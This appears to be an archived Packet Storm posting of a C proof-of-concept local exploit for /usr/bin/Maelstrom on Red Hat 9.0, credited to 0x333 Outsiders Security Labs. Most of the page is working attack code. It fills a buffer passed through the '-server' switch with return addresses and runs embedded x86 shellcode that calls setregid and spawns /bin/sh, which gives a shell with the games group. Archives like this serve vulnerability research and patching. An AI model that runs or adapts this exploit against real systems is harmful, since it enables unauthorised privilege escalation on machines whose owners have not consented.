Maelstrom local exploit that gives gid for user games making use of the overflow found in the -server switch. Tested against /usr/bin/Maelstrom on Red Hat 9.0
d35fbfa93b97946227f3f1032375023f8f6aba52ebed8a946e94bfbe4648d811/* 0x333maelstrom => Maelstrom local game exploit
*
* proof-of-concept exploit tested against
* /usr/bin/Maelstrom under RH 9.0
*
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define MAEL "/usr/bin/Maelstrom"
#define SIZE 8177
#define ALIGN 3
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b"
"\xcd\x80";
int main()
{
int i;
char out[SIZE];
char *cya[2] = { shellcode, NULL };
int *own = (int *)(out + ALIGN);
int ret = 0xbffffffa - strlen(shellcode) - strlen(MAEL);
for (i=0 ; i<SIZE-1 ; i+=4)
*own++ = ret;
out[0] = '3';
out[1] = '@';
out[2] = '3';
fprintf (stdout, "\n ** /usr/bin/Maelstrom local game exploit vr.0.2\n");
fprintf (stdout, " ** by c0wboy / www.0x333.org\n\n");
execle (MAEL, MAEL, "-server", out, NULL, cya);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed